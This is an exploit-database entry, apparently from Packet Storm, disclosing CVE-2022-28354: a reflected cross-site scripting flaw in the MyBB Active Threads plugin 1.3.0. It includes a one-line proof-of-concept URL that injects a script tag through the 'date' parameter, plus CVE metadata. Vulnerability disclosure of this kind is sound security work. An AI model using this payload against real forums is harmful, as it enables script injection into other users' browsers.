Lucene search
0xB9PACKETSTORM:171402HistoryMar 20, 2023 - 12:00 a.m.
MyBB Active Threads 1.3.0 Cross Site Scripting
2023-03-2000:00:00
0xB9
packetstormsecurity.com
152
mybb active threads
cross-site scripting
cve-2022-28354
plugin 1.3.0
xss
windows 10
EPSS
0.001
Percentile
49.9%
`# Exploit Title: MyBB Active Threads Plugin 1.3.0 – Cross-Site Scripting
# Date: February 9, 2022
# Author: 0xB9
# Twitter: @0xB9sec
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1336
# Version: 1.3.0
# Tested On: Windows 10
# CVE: CVE-2022-28354
Description:
This plugin shows a page of active threads. The date parameter is vulnerable to XSS when setting a time period.
Proof of Concept:
activethreads.php?days=7&hours=0&mins=0&date=”><script>alert(1)</script>
`
Related
cvelist
cvelist
CVE-2022-28354
2023-04-24 00:00:00
prion
prion
Design/Logic Flaw
2023-04-24 21:15:00
cve
cve
CVE-2022-28354
2023-04-24 21:15:09
nvd
nvd
CVE-2022-28354
2023-04-24 21:15:09